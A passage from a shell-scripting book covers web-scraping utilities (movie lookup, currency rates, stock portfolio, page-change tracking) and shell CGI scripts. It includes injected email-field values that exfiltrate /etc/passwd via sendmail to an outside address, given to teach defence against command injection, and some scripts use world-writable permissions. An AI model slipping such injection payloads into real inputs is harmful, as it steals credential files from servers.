if [ $# -eq 1 ] ; then
  nodigits="$(echo $1 | sed 's/[[:digit:]]*//g')"
  if [ -z "$nodigits" ] ; then
    lynx -source "$titleurl$fixedname" > $tempout
    summarize_film
  fi
fi

url="$imdburl$fixedname"
lynx -source $url > $tempout

if [ ! -z "$(grep "IMDb title search" $tempout)" ] ; then
  grep 'HREF="/Title?' $tempout | \
    sed 's/<OL><LI><A HREF="//;s/<\/A><\/LI>//;s/<LI><A HREF="//' | \
    sed 's/">/ -- /;s/<.*//;s/\/Title?//' | \
    sort -u | \
    more
else
  summarize_film
fi

exit 0

How It Works
This script builds a different URL depending on whether the command argument specified is a film name or an IMDb
film ID number, and then it saves the lynx output from the web page to the $tempout file.
If the command argument is a film name, the script then examines $tempout for the string "IMDb title search" to see
whether the file contains a list of film names (when more than one movie matches the search criteria) or the description
of a single film. Using a complex series of sed substitutions that rely on the source code organization of the IMDb site,
it then displays the output appropriately for each of those two possible cases.
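The cache-then-test pattern can be sketched in isolation; the marker is the same string the script greps for, but the cached file contents here are fabricated:

```shell
# Fabricated cached page standing in for the saved lynx output
tempout="/tmp/moviedata.demo.$$"
echo 'IMDb title search (partial matches)' > "$tempout"

# One cheap grep over the cache chooses the processing branch:
if [ ! -z "$(grep 'IMDb title search' $tempout)" ] ; then
  echo "multiple matches: show the list of titles"
else
  echo "single match: summarize the film"
fi
rm -f "$tempout"
```

Because the page is saved to disk first, both passes read the same bytes without hitting the website twice.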

Running the Script


Though short, this script is quite flexible with input formats: You can specify a film title in quotes or as separate words.
If more than one match is returned, you can then specify the eight-digit IMDb ID value to select a specific match.

The Results
$ moviedata lawrence of arabia
0056172 -- Lawrence of Arabia (1962)
0099356 -- Dangerous Man: Lawrence After Arabia, A (1990) (TV)
0194547 -- With Allenby in Palestine and Lawrence in Arabia (1919)
0245226 -- Lawrence of Arabia (1935)
0363762 -- Lawrence of Arabia: A Conversation with Steven Spielberg (2000) (V)
0363791 -- Making of 'Lawrence of Arabia', The (2000) (V)
$ moviedata 0056172
Lawrence of Arabia (1962)
  Plot Outline: British lieutenant T.E. Lawrence rewrites the political
  history of Saudi Arabia.
$ moviedata monsoon wedding
Monsoon Wedding (2001)
  Plot Outline: A stressed father, a bride-to-be with a secret, a
  smitten event planner, and relatives from around the world create
  much ado about the preparations for an arranged marriage in India.

Hacking the Script


The most obvious hack to this script would be to get rid of the ugly IMDb movie ID numbers. It would be
straightforward to hide the movie IDs (because the IDs as shown are rather unfriendly and prone to mistyping) and
have the shell script output a simple menu with unique index values (e.g., 1, 2, 3) that can then be typed in to select a
particular film.
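A minimal sketch of that menu idea, assuming search results in the "ID -- Title" lines the script already produces (the sample titles are copied from the output above):

```shell
# Replace the raw IMDb IDs with simple 1), 2), ... menu numbers,
# keeping only the human-readable title portion of each line:
cat << 'EOF' | awk '{ printf "%d) %s\n", NR, substr($0, index($0, "--") + 3) }'
0056172 -- Lawrence of Arabia (1962)
0245226 -- Lawrence of Arabia (1935)
EOF
```

A fuller version would also save the ID-to-number mapping to a file so a follow-up invocation could translate the user's menu choice back into the real IMDb ID.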
A problem with this script, as with most scripts that scrape values from a third-party website, is that if IMDb changes its
page layout, the script will break and you'll need to rebuild the script sequence. It's a lurking bug, but with a site like
IMDb that hasn't changed in years, probably not a dramatic or dangerous one.

#66 Calculating Currency Values


A particularly interesting use of shell scripts is to offer a command-line currency conversion routine. This proves to be
a two-part task, because the latest exchange rates should be cached, but that cache needs to be refreshed every day
or two so that the rates stay reasonably up-to-date for the calculations.
Hence this solution is split into two scripts. The first script gets the exchange rate from CNN's money and finance
website (http://money.cnn.com/) and saves it in a temporary cache file called .exchangerate. The
second script provides the user interface to the exchange rate information and allows easy calculation of currency
conversions.

The Code
#!/bin/sh

# getexchrate - Scrapes the current currency exchange rates
#   from CNN's money and finance website.
#
#   Without any flags, this grabs the exchange rate values if the
#   current information is more than 12 hours old. It also shows
#   success upon completion, something to take into account if
#   you run this from a cron job.

url="http://money.cnn.com/markets/currencies/crosscurr.html"
age="+720"                   # 12 hours, in minutes
outf="/tmp/.exchangerate"

# Do we need the new exchange rate values? Let's check to see:
# If the file is less than 12 hours old, the find fails...

if [ -f $outf ] ; then
  if [ -z "$(find $outf -cmin $age -print)" ] ; then
    echo "$0: exchange rate data is up-to-date." >&2
    exit 1
  fi
fi

# Actually get the latest exchange rates, translating into the
# format required by the exchangerate script.

lynx -dump "$url" | \
  grep -E '(Japan|Euro|Can|UK)' | \
  awk '{ if (NF == 5) { print $1"="$2 } }' | \
  tr '[:upper:]' '[:lower:]' | \
  sed 's/dollar/canad/' > $outf

echo "Success. Exchange rates updated at $(date)."

exit 0
The other script that's important for this to work is exchangerate, the actual command users invoke to calculate
currency conversions:
#!/bin/sh
# exchangerate - Given a currency amount, converts it into other major
#    currencies and shows the equivalent amounts in each.
# ref URL: http://money.cnn.com/markets/currencies/

showrate()
{
  dollars="$(echo $1 | cut -d. -f1)"
  cents="$(echo $1 | cut -d. -f2 | cut -c1-2)"
  rate="$dollars.${cents:-00}"
}

exchratefile="/tmp/.exchangerate"
scriptbc="scriptbc -p 30"      # tweak this as needed

. $exchratefile

# The 0.000000001 compensates for a rounding error bug in
# many versions of bc, where 1 != 0.99999999999999

useuro="$($scriptbc 1 / $euro + 0.000000001)"
uscand="$($scriptbc 1 / $canada + 0.000000001)"
usyen="$($scriptbc 1 / $japan + 0.000000001)"
uspound="$($scriptbc 1 / $uk + 0.000000001)"

if [ $# -ne 2 ] ; then
  echo "Usage: $(basename $0) amount currency"
  echo "Where currency can be USD, Euro, Canadian, Yen, or Pound."
  exit 0
fi

amount=$1
currency="$(echo $2 | tr '[:upper:]' '[:lower:]' | cut -c1-2)"

case $currency in
  us|do ) if [ -z "$(echo $1 | grep '\.')" ] ; then
            masterrate="$1.00"
          else
            masterrate="$1"
          fi
          ;;
  eu    ) masterrate="$($scriptbc $1 \* $euro)"    ;;
  ca|cd ) masterrate="$($scriptbc $1 \* $canada)"  ;;
  ye    ) masterrate="$($scriptbc $1 \* $japan)"   ;;
  po|st ) masterrate="$($scriptbc $1 \* $uk)"      ;;
  *     ) echo "$0: unknown currency specified."
          echo "I only know USD, EURO, CAND/CDN, YEN and GBP/POUND."
          exit 1
esac

echo "Currency Exchange Rate Equivalents for $1 ${2}:"

showrate $masterrate
echo "      US Dollars: $rate"

showrate $($scriptbc $masterrate \* $useuro)
echo "        EC Euros: $rate"

showrate $($scriptbc $masterrate \* $uscand)
echo "Canadian Dollars: $rate"

showrate $($scriptbc $masterrate \* $usyen)
echo "    Japanese Yen: $rate"

showrate $($scriptbc $masterrate \* $uspound)
echo "  British Pounds: $rate"

exit 0

How It Works
When run, if the exchange rate database .e x c h a n g e r a t e is more than 12 hours out-of-date, the first script,
g e t e xc hr ate , grabs the latest exchange rate information from the CNN site, extracts the exchange rates for the
major currencies specified in the script, and then saves them in a c u r r e n c y = v a l u e format. Here's how the
.ex c ha ng era t e data file appears after the script is run:
$ c a t /t mp/ . exch a nger a te
c a n a da =0 .74 7 100
e u r o =1 .1 733 0 0
j a p a n= 0. 009 1 63
u k = 1 .6 64 400
The second script, exchangerate, is rather long and relies on Script #9, scriptbc, for all of the mathematics
involved. The basic algorithm of the script is to normalize the currency value specified in the command arguments to
U.S. dollars by multiplying the specified value by the appropriate exchange rate, and then to use the relationship
between the U.S. dollar and each foreign currency to calculate the equivalent value in each currency.
From a scripting point of view, note particularly how exchangerate incorporates the exchange rate values from the
.exchangerate data file:

. $exchratefile

This is known as sourcing a file, and it causes the specified file (script) to be read as if its contents were part of this
script. This will make more sense if we contrast it with the result of the following line:

sh $exchratefile

This does exactly the wrong thing: It spawns a subshell, sets the exchange rate variables within that subshell, and then
quits the subshell, leaving the calling script without access to the values for these variables.
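The difference is easy to demonstrate with a throwaway file in the same currency=value format (the temporary file here is purely illustrative, not part of the book's scripts):

```shell
# Build a tiny rate file like the one getexchrate writes
ratefile=$(mktemp)
echo 'euro=1.173300' > $ratefile

# Running it with 'sh' sets the variable only inside the subshell
sh $ratefile
echo "after sh: euro='${euro}'"

# Sourcing it reads the assignment into the current shell
. $ratefile
echo "after sourcing: euro='${euro}'"

rm -f $ratefile
```

The first echo shows an empty value; only after sourcing does the variable exist in the calling shell.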

Running the Script

This pair of scripts is typical of sophisticated Unix interaction, with getexchrate being the one "admin" script doing
the necessary back-end work to ensure that the exchange rate data is correct and up-to-date, and exchangerate
being the "user" script that has all the proverbial bells and whistles but doesn't touch the Internet at all.
Although the getexchrate script can be run as frequently as desired, it actually gets and updates the currency
exchange rates only if $exchratefile is more than 12 hours old. This lends itself to being a daily cron job,
perhaps just during weekdays (the currency markets aren't open on weekends, so the rates don't fluctuate from Friday
evening to Monday morning).
The exchangerate script expects two arguments: a currency amount and a currency name. It's flexible in this
regard, so 100 CDN and 100 Canadian are the same, while 25 EU and 25 Euros will also both work. If no currency
name is specified, the default is USD, U.S. dollars.
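The getexchrate half of the pair isn't shown in this excerpt, but its 12-hours-old test can be approximated with find's -mmin predicate (a GNU/BSD extension rather than strict POSIX); this sketch is mine, not the book's:

```shell
exchratefile=$(mktemp)    # stand-in for /tmp/.exchangerate

# find prints the filename only if it was modified more than
# 720 minutes (12 hours) ago; a freshly created file is not stale
if [ -n "$(find "$exchratefile" -mmin +720 2>/dev/null)" ] ; then
  stale=yes
else
  stale=no
fi
echo "stale=$stale"

rm -f "$exchratefile"
```

When stale=yes, the admin script would refetch the CNN page; otherwise it leaves the cached rates alone.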

The Results
$ getexchrate
Success. Exchange rates updated at Thu Oct  9 23:07:27 MDT 2003.
$ exchangerate 250 yen
Currency Exchange Rate Equivalents for 250 yen:
      US Dollars: 2.29
        EC Euros: 1.95
Canadian Dollars: 3.06
    Japanese Yen: 250.00
  British Pounds: 1.37
$ exchangerate 250 pounds
Currency Exchange Rate Equivalents for 250 pounds:
      US Dollars: 416.05
        EC Euros: 354.44
Canadian Dollars: 556.96
    Japanese Yen: 45395.52
  British Pounds: 250.00
$ exchangerate 250 dollars
Currency Exchange Rate Equivalents for 250 dollars:
      US Dollars: 250.00
        EC Euros: 212.98
Canadian Dollars: 334.67
    Japanese Yen: 27277.68
  British Pounds: 150.22

Hacking the Script


Within a network, a single system could poll the CNN site for up-to-date exchange values and push the
$exchratefile out to workstations on the system (perhaps with an ftpsyncdown script like that shown in
Script #81). The exchangerate script is then all that's installed on individual systems to enable this useful
functionality.
You could cobble together a web-based interface to the exchange rate script by having a page with a text input
field for the desired amount and a pop-up menu of currency types. Submit it, turn those two data snippets into the
appropriate input format for the exchangerate script, and then feed the output back to the web browser with the
appropriate HTML wrapper.

#67 Tracking Your Stock Portfolio


A more complex task for the shell is to keep track of the overall value of your stock portfolio. While this might actually
be too depressing to see each time you log in, the building blocks are quite informative and valuable on their own.
Like Script #66, this solution is built from two different scripts, one that extracts the most recently traded value of a
given stock, and a second script that reads and calculates running totals for a portfolio of stocks.

The Code
#!/bin/sh

# getstock - Given a stock ticker symbol, returns its current value
#    from the Lycos website.

url="http://finance.lycos.com/qc/stocks/quotes.aspx?symbols="

if [ $# -ne 1 ] ; then
  echo "Usage: $(basename $0) stocksymbol" >&2
  exit 1
fi

value="$(lynx -dump "$url$1" | grep 'Last price:' | \
  awk -F: 'NF > 1 && $(NF) != "N/A" { print $(NF) }')"

if [ -z "$value" ] ; then
  echo "error: no value found for ticker symbol $1." >&2
  exit 1
fi

echo $value
exit 0
The second script is the wrapper that allows users to create a rudimentary data file with stock name, stock ticker
symbol, and the number of shares held, and then have the valuation of their entire portfolio calculated based on the
latest (well, 15-minute-delayed) quotes for each stock in the file:
#!/bin/sh

# portfolio - Calculates the value of each stock in your holdings,
#    then calculates the value of your overall portfolio, based on
#    the latest stock market position.

scriptbc="$HOME/bin/scriptbc"    # tweak this as needed
portfolio="$HOME/.portfolio"

if [ ! -f $portfolio ] ; then
  echo "$(basename $0): No portfolio to check? ($portfolio)" >&2
  exit 1
fi

while read holding
do
  eval $(echo $holding | \
    awk -F\| '{print "name=\""$1"\"; ticker=\""$2"\"; hold=\""$3"\""}')
  if [ ! -z "$ticker" ] ; then
    value="$(getstock $ticker)"
    totval="$($scriptbc ${value:-0} \* $hold)"
    echo "$name is trading at $value (your $hold shares = $totval)"
    sumvalue="$($scriptbc ${sumvalue:-0} + $totval)"
  fi
done < $portfolio

echo "Total portfolio value: $sumvalue"
exit 0

How It Works
The getstock script is one of the most straightforward in this chapter. It emulates a method=get query to Lycos
Finance and then extracts the value of a single stock specified as the command argument by finding the line in the web
page that indicates "Last price:" and extracting the subsequent price.
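You can exercise the extraction pipeline offline on a captured line of lynx -dump output (the sample line and price here are invented for illustration):

```shell
# One line of the sort 'lynx -dump' emits for a quote page
sample='   Last price: 22.61'

# The same grep/awk pair getstock uses: split on colons, keep the
# last field when it isn't "N/A"
value="$(echo "$sample" | grep 'Last price:' | \
  awk -F: 'NF > 1 && $(NF) != "N/A" { print $(NF) }')"

# echo without quotes trims the leading space, as in getstock itself
echo $value
```
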
The wrapper script portfolio calculates the value of all stocks in a portfolio, using the information stored in the
portfolio data file, which is organized as a simple text file with stock name, ticker symbol, and the number of shares
held. For parsing simplicity, the data file fields are separated by a | symbol, a character that's not likely to show up in a
company name. The portfolio script extracts the value of each of these fields, calculates the current value of each
stock by calling getstock, and then multiplies that by the shares held to ascertain the total value of that stock. Sum
them up, and you have the portfolio value.
The eval command on the first line of the while loop in portfolio is the trickiest element of the script:

eval $(echo $holding | \
  awk -F\| '{print "name=\""$1"\"; ticker=\""$2"\"; hold=\""$3"\""}')

Within the subshell, awk parses a line from the portfolio database, splitting it into three fields, and then outputs them in
name=value format. Then the call to eval, within which the awk call is contained, forces the script to evaluate the
awk output as if it were entered directly into the shell. For example, for the Apple holdings in the portfolio shown in the
next section, the subshell result would be

name="Apple Computer"; ticker="AAPL"; hold="500"

Once evaluated by eval, the three variables name, ticker, and hold would then actually be instantiated with the
values specified. The rest of the script can then reference these three values by name, without any additional fiddling.
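You can watch the transformation happen on a single record (the holding shown is the Apple sample from the portfolio file):

```shell
holding='Apple Computer|AAPL|500'

# awk emits shell assignments; eval then executes them in this shell
eval $(echo $holding | \
  awk -F\| '{print "name=\""$1"\"; ticker=\""$2"\"; hold=\""$3"\""}')

echo "name=$name ticker=$ticker hold=$hold"
```

Note that the quoting awk emits is what keeps the two-word company name intact when eval re-parses the string.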

Running the Script


The getstock script isn't intended to be run directly, though given a stock ticker symbol, it'll return the current
trading price. The portfolio script requires a separate data file that contains stock name, stock ticker symbol, and
the number of shares held. Here's a sample of how that might look:
$ cat ~/.portfolio
# format is company name, ticker symbol, holdings
Apple Computer|AAPL|500
Cable & Wireless|CWP|100
Intel|INTC|300
Jupiter Media|JUPM|50
eBay|EBAY|200
Microsoft|MSFT|200
Qualcomm|QCOM|100

The Results
$ portfolio
Apple Computer is trading at 22.61 (your 500 shares = 11305.00)
Cable & Wireless is trading at 5.63 (your 100 shares = 563.00)
Intel is trading at 28.59 (your 300 shares = 8577.00)
Jupiter Media is trading at 3.95 (your 50 shares = 197.50)
eBay is trading at 55.41 (your 200 shares = 11082.00)
Microsoft is trading at 26.52 (your 200 shares = 5304.00)
Qualcomm is trading at 41.33 (your 100 shares = 4133.00)
Total portfolio value: 41161.50

Hacking the Script


Obvious areas for improvement would be to add support for overseas exchange holdings and to allow dynamic lookup
of ticker symbols by specifying stock names. And if you're a real gambler who can handle seeing your occasional
losses, you could include the original purchase price for each stock as a fourth field in the portfolio file and then
compute not only the current portfolio value but also the difference in value against the original purchase price of each
stock in the portfolio.

#68 Tracking Changes on Web Pages


Sometimes great inspiration comes from seeing an existing business and saying to yourself, "That doesn't seem too
hard." The task of tracking changes on a website is a surprisingly simple way of collecting such inspirational material,
as shown in this script, changetrack. This script does have one interesting nuance: When it detects changes to the
site, it emails the new web page, rather than just reporting it on the command line.

The Code
#!/bin/sh

# changetrack - Tracks a given URL and, if it's changed since the last
#    visit, emails the new page to the specified address.

sitearchive="/usr/tmp/changetrack"     # change as desired
sendmail="/usr/sbin/sendmail"          # might need to be tweaked!
fromaddr="webscraper@intuitive.com"    # change as desired

if [ $# -ne 2 ] ; then
  echo "Usage: $(basename $0) url email" >&2
  exit 1
fi

if [ ! -d $sitearchive ] ; then
  if ! mkdir $sitearchive ; then
    echo "$(basename $0) failed: couldn't create $sitearchive." >&2
    exit 1
  fi
  chmod 777 $sitearchive     # you might change this for privacy
fi

if [ "$(echo $1 | cut -c1-5)" != "http:" ] ; then
  echo "Please use fully qualified URLs (e.g., start with 'http://')" >&2
  exit 1
fi

fname="$(echo $1 | sed 's/http:\/\///g' | tr '/?&' '...')"
baseurl="$(echo $1 | cut -d/ -f1-3)/"

# Grab a copy of the web page into an archive file. Note that we can
# track changes by looking just at the content (e.g., '-dump', not
# '-source'), so we can skip any HTML parsing...

lynx -dump "$1" | uniq > $sitearchive/${fname}.new

if [ -f $sitearchive/$fname ] ; then
  # We've seen this site before, so compare the two with 'diff'.
  # diff exits 0 when the files are identical, so success here
  # means there's nothing new.
  if diff $sitearchive/$fname $sitearchive/${fname}.new > /dev/null ; then
    rm -f $sitearchive/${fname}.new    # nothing new...
    exit 0                             # no change, we're outta here
  else
    echo "Site $1 has changed since our last check."
  fi
else
  echo "Note: we've never seen this site before."
fi

# For the script to get here, the site must have changed, and we need to send
# the contents of the .new file to the user and replace the original with the
# .new for the next invocation of the script.

( echo "Content-type: text/html"
  echo "From: $fromaddr (Web Site Change Tracker)"
  echo "Subject: Web Site $1 Has Changed"
  echo "To: $2"
  echo ""

  lynx -source $1 | \
    sed -e "s|[sS][rR][cC]=\"|SRC=\"$baseurl|g" \
        -e "s|[hH][rR][eE][fF]=\"|HREF=\"$baseurl|g" \
        -e "s|$baseurl\/http:|http:|g"
) | $sendmail -t

# Update the saved snapshot of the website
mv $sitearchive/${fname}.new $sitearchive/$fname
chmod 777 $sitearchive/$fname

# and we're done.
exit 0

How It Works
Given a website URL and a destination email address, this script grabs the URL's web page content and compares it
against the content of the site from the previous check.
If it's changed, the new web page is emailed to the specified recipient, with some simple rewrites to try to keep the
graphics and H REFs working. These HTML rewrites are worth examining:
l y nx - sou r ce $ 1 | \
se d -e " s|[s S ][rR ] [cC] =\" | S R C = \ " $ b a s e u r l | g " \
-e " s|[h H ][rR ] [eE] [fF ] = \ " | H R E F = \ " $ b a s e u r l | g " \
-e " s|$b a seur l \/ht tp: | h t t p : | g "
The call to lyn x retrieves the source of the specified web page, and then s e d performs three different translations.
S R C = " is rewritten as S R C="b a seur l/ to ensure that any relative pathnames of the nature S R C = " l o g o . g i f "
are rewritten to work properly as full pathnames with the domain name. If the domain name of the site is
h t t p :/ /w ww. i ntui t ive. c om/, the rewritten HTML would be:
S R C = "h tt p:/ / www. i ntui t ive. com / l o g o . g i f " . H R E F attributes are similarly rewritten, and then, to
ensure we haven't broken anything, the third translation pulls the b a s e u r l back out of the HTML source in situations
where it's been erroneously added. For example,
H R E F =" ht tp: / /www . intu i tive .co m / h t t p : / / w w w . some-whereelse. c o m / l i n k " is clearly broken and
must be fixed for the link to work.
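These translations can be exercised on a scrap of HTML without touching the network. One detail: since $baseurl already ends with a slash, the repair pattern below matches ${baseurl}http: directly rather than using the script's extra escaped slash; the HTML fragment itself is invented:

```shell
baseurl="http://www.intuitive.com/"
fragment='<img src="logo.gif"><a href="http://www.nostarch.com/">'

# Same three translations: absolutize src=, absolutize href=, then
# strip the base URL back off any already-absolute link
rewritten="$(printf '%s' "$fragment" |
  sed -e "s|[sS][rR][cC]=\"|SRC=\"$baseurl|g" \
      -e "s|[hH][rR][eE][fF]=\"|HREF=\"$baseurl|g" \
      -e "s|${baseurl}http:|http:|g")"

echo "$rewritten"
```

The relative src gains the full domain while the already-absolute href comes back out unharmed.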
Notice also that the recipient address is specified in the echo statement (echo "To: $2") rather than as an
argument to sendmail. This is a simple security trick: By having the address within the sendmail input stream
(which sendmail knows to parse for recipients because of the -t flag), there's no worry about users playing games
with addresses like "joe;cat /etc/passwd | mail larry". It's a good technique to use for all invocations
of sendmail within shell scripts.

Running the Script


This script requires two parameters: the URL of the site being tracked (you'll need to use a fully qualified URL that
begins with http:// for it to work properly) and the email address of the person, or comma-separated group of
people, who should receive the updated web page, as appropriate.

The Results
The first time the script sees a web page, the page is automatically mailed to the specified user:
$ changetrack http://www.intuitive.com/blog/ taylor@intuitive.com
Note: we've never seen this site before.
The resultant emailed copy of the site, while not exactly as it would appear in the web browser, is still quite readable,
as shown in Figure 7-2.

Figure 7-2: The site has changed, so the page is sent via email from changetrack
All subsequent checks of http://www.intuitive.com/blog/ will produce an email copy of the site only if
the page has changed since the last invocation of the script. This change can be as simple as a single value or as
complex as a complete redesign. While this script can be used for tracking any website, sites that don't change
frequently will probably work best: If the site changes every few hours (such as the CNN home page), checking for
changes is a waste of CPU cycles, because it'll always be changed.
When the script is invoked the second time, nothing has changed, and so it has no output and produces no electronic
mail to the specified recipient:
$ changetrack http://www.intuitive.com/blog/ taylor@intuitive.com
$

Hacking the Script


There are a lot of ways you can tweak and modify this script to make it more useful. One change could be to have a
"granularity" option that would allow users to specify that if only one line has changed, the site shouldn't be considered
updated. (To accomplish this trick, pipe the output of the diff invocation to wc -l and count the lines of changed
output.)
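The counting step might be sketched like this (the filenames and threshold are arbitrary, not from the book's script):

```shell
old=$(mktemp) ; new=$(mktemp)
printf 'line one\nline two\nline three\n' > "$old"
printf 'line one\nline 2\nline three\n'   > "$new"

# One changed line produces four lines of diff output (2c2, <, ---, >)
changed=$(diff "$old" "$new" | wc -l)
echo "diff output lines: $changed"

threshold=5
if [ "$changed" -gt "$threshold" ] ; then
  echo "report the change"
else
  echo "below the granularity threshold; stay quiet"
fi

rm -f "$old" "$new"
```
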
This script is also more useful when invoked from a cron job on a daily or weekly basis. I have similar scripts that run
every night and send me updated web pages from various sites that I like to track. It saves lots of time-wasting surfing!
Most interesting of the possible hacks is to modify this script to work off a data file of URLs and email addresses,
rather than requiring those as input parameters. Drop that modified version of the script into a cron job, write a
web-based front end to the utility, and you've just duplicated a function that some companies charge people money to
use on the Web. No kidding.
Another way to track changes

There's another way to track web page changes that's worth a brief mention: RSS. Known as Really Simple
Syndication, RSS-enabled web pages have an XML version of the site that makes tracking changes trivial, and there
are a number of excellent RSS trackers for Windows, Mac, and Linux/Unix. A good place to start learning about RSS
is http://rss.intuitive.com/. The vast majority of sites aren't RSS enabled, but it's darn useful and worth keeping an eye
on!

Chapter 8: Webmaster Hacks


Overview
In addition to offering a great environment for building nifty command-line-based tools that work with various Internet
sites, shell scripts can also change the way your own website works, starting with some simple debugging tools and
expanding to the creation of web pages on demand, a photo album browser that automatically incorporates new
images uploaded to the server, and more.
All of these uses of the shell for Common Gateway Interface (CGI) scripts share one common trait, however: They
require you to be conscious and aware of possible security risks. The most common hack that can catch an unaware
web developer is the exploitation of the command line, accessed within the scripts.
Consider this seemingly benign example: On a web page, you have a form for people to fill out. One of the fields is
their email address, and within your script you not only store their information within a local database, you also email
them an acknowledgment:
( echo "Subject: Thanks for your signup"
  echo "To: $email ($name)"
  echo ""
  echo "Thanks for signing up. You'll hear from us shortly."
  echo "-- Dave and the team"
) | sendmail $email

Seems innocent, doesn't it? Now imagine what would happen if the email address, instead of
<taylor@intuitive.com>, was entered as

`sendmail d00d37@das-hak.de < /etc/passwd; echo taylor@intuitive.com`

Can you see the danger lurking in that? Rather than just sending the short email to the address, this sends a copy of
your /etc/passwd file to a delinquent at @das-hak.de, to perhaps use as the basis of a determined attack on
your system security.
As a result, many CGI scripts are written in more security-conscious environments, notably including the -w-enabled
Perl world, in which the script fails if data is utilized from an external source without being "scrubbed" or checked.
But this lack of security features doesn't preclude shell scripts from being equal partners in the world of web security. It
just means that you need to be thoughtful and conscious of where problems might creep in and eliminate them. For
example, a tiny change in the script just shown would prevent any potential hooligans from providing bad external data:
( echo "Subject: Thanks for your signup"
  echo "To: $email ($name)"
  echo ""
  echo "Thanks for signing up. You'll hear from us shortly."
  echo "-- Dave and the team"
) | sendmail -t

The -t flag to sendmail tells the program to scan the message itself for valid destination email addresses. The
backquoted material never sees the light of a command line, as it's interpreted as an invalid email address within the
sendmail queuing system (and then safely ends up in a log file).
Another safety mechanism requires that information sent from the web browser to the server be encoded; a backquote,
for example, would actually be sent to the server (and handed off to the CGI script) as %60, which can certainly be
safely handled by a shell script without danger.
One common characteristic of all the CGI scripts in this chapter is that they do very, very limited decoding of the
encoded strings: Spaces are encoded with a + for transmission, so translating them back to spaces is safe. The @
character in email addresses is sent as %40, so that's safely transformed back too. Other than that, the scrubbed
string can safely be scanned for the presence of a % and generate an error if encountered. This is highlighted in the
code used in Script #72, Processing Contact Forms.
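A minimal decoder following these rules might look like the function below; the function name and error message are mine, not from Script #72:

```shell
decode_query() {
  # Turn + back into spaces and %40 back into @, then reject
  # anything that still contains a % escape as suspicious
  decoded="$(echo "$1" | sed 's/+/ /g;s/%40/@/g')"
  case "$decoded" in
    *%* ) echo "suspicious escape in input" >&2 ; return 1 ;;
    *   ) echo "$decoded" ;;
  esac
}

decode_query 'dave+taylor'             # prints: dave taylor
decode_query 'taylor%40intuitive.com'  # prints: taylor@intuitive.com
decode_query 'evil%60cmd%60' 2>/dev/null || echo "blocked"
```

A backquote arrives as %60, so it trips the final case branch and never reaches a command line.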
Ultimately, highly sophisticated websites will use more robust and powerful tools than the shell, but as with many of the
solutions in this book, a 20- to 30-line shell script can often be enough to validate an idea, prove a concept, or solve a
simple problem in a fast, portable, and reasonably efficient manner.
Try them online!

You can explore many of the scripts in this chapter online at http://www.intuitive.com/wicked/

Running the Scripts in This Chapter


To run any of the CGI shell scripts presented in this chapter, you'll need to do a bit more than just name the script
appropriately and save it. You must also place the script in the proper location, as determined by the configuration of
the web server running on your system.
Unless you've specifically configured your web server to run .sh scripts as CGI programs, you'll want all of the
scripts in this chapter to have a .cgi filename suffix. You should save the .cgi files either in the desired directory
on your web server or in its /cgi-bin/ directory, again depending on the configuration. It is important to note that
the .cgi file-naming conventions in this chapter assume that you are saving those files in your web server's root
directory. If you are instead saving them in its /cgi-bin/ directory, you must add /cgi-bin/ to all of the script
paths in this chapter. For example, script-name.cgi becomes /cgi-bin/script-name.cgi. Finally,
you'll need to ensure that each .cgi script is readable and executable by everyone, because on most web servers
your web queries run as user nobody or similar.
Of course, you need a web server running to have any of these scripts work properly. Fortunately, just about every
cool modern OS includes either Apache or something similar, so getting a server up and running should be
straightforward. You will need to ensure that the script directory on your web server has CGI execution permission in
the server configuration file. In Apache, for example, the directory needs to have Options ExecCGI specified in the
httpd.conf file for the scripts to work. Then ensure that the directory is globally readable and executable.
Of course, the alternative is to experiment with these scripts on a web server that is not on your machine but that is
already hopefully set up properly. Talk with your web hosting provider; you'll need access to a web server that not
only allows you to execute your own CGI scripts but also allows you to telnet or (preferably) ssh into the server to
tweak the scripts. Most hosting companies do not allow this access, due to security concerns, but you can find a bunch
of possibilities by searching Google for "web hosting ssh telnet access."

#69 Seeing the CGI Environment


Sometimes scripts can be quite simple and still have useful results. For example, while I was developing some of the
scripts for this chapter, Apple released its Safari web browser. My immediate question was, "How does Safari identify
itself within the HTTP_USER_AGENT string?"
Finding the answer is quite a simple task for a CGI script, a script that can be written in the shell.

The Code
#!/bin/sh

# showCGIenv - Displays the CGI runtime environment, as given to any
#    CGI script on this system.

echo "Content-type: text/html"
echo ""

# Now the real information

echo "<html><body bgcolor=\"white\"><h2>CGI Runtime Environment</h2>"
echo "<pre>"
env || printenv
echo "</pre>"
echo "<h3>Input stream is:</h3>"
echo "<pre>"
cat
echo "(end of input stream)</pre></body></html>"
exit 0

How It Works
When a query comes from a web client to a web server, the query sequence includes a number of environment
variables that the web server (Apache, in this instance) hands to the script or program specified (the so-called
Common Gateway Interface). This script displays this data by using the shell env command, with the rest of the script
being necessary wrapper information to have the results fed back through the web server to the remote browser.

Running the Script


To run this code, you need to have the script executable and located on your web server. (See the earlier section
"Running the Scripts in This Chapter" for more details.) Then simply request the saved .cgi file within a web browser.

The Results

Figure 8-1: The CGI runtime environment, from a shell script

#70 Logging Web Events


A cool use of a shell-based CGI script is to log events by using a wrapper. Suppose that I'd like to have a Yahoo!
search box on my web page, but rather than feed the queries directly to Yahoo!, I'd like to log them first, to build up a
database of what people seek from my site.
First off, a bit of HTML and CGI: Input boxes on web pages are created inside forms, and forms submit the user's
information for processing by sending it to a remote program specified in the value of the form's action attribute.
The Yahoo! query box on any web page can be reduced to the following:
<form method="get" action="http://search.yahoo.com/bin/search">
Search Yahoo:
<input type="text" name="p">
<input type="submit" value="search">
</form>

However, rather than hand the search pattern directly to Yahoo!, we want to feed it to a script on our own server,
which will log the pattern and then redirect the query along to the Yahoo! server. The form therefore changes in only
one small regard: The action field becomes a local script rather than a direct call to Yahoo!:

<!-- Tweak action value if script is placed in /cgi-bin/ or other -->
<form method="get" action="log-yahoo-search.cgi">

The log-yahoo-search.cgi script is remarkably simple, as you will see.

The Code
#!/bin/sh

# log-yahoo-search - Given a search request, logs the pattern, then
#    feeds the entire sequence to the real Yahoo! search system.

# Make sure the directory path and file listed as 'logfile' are writable by
# user nobody, or whatever user you have as your web server uid.

logfile="/var/www/wicked/scripts/searchlog.txt"

if [ ! -f $logfile ] ; then
  touch $logfile
  chmod a+rw $logfile
fi

if [ -w $logfile ] ; then
  echo "$(date): $QUERY_STRING" | sed 's/p=//g;s/+/ /g' >> $logfile
fi

echo "Location: http://search.yahoo.com/bin/search?$QUERY_STRING"
echo ""
exit 0

How It Works
The most notable elements of the script have to do with how web servers and web clients communicate. The
information entered into the search box is sent to the server as the variable Q UE R Y_ ST R IN G, encoded by replacing
spaces with the + sign and other non-alphanumeric characters with the appropriate character sequences. Then, when
the search pattern is logged, all + signs are translated back to spaces safely and simply, but otherwise the search
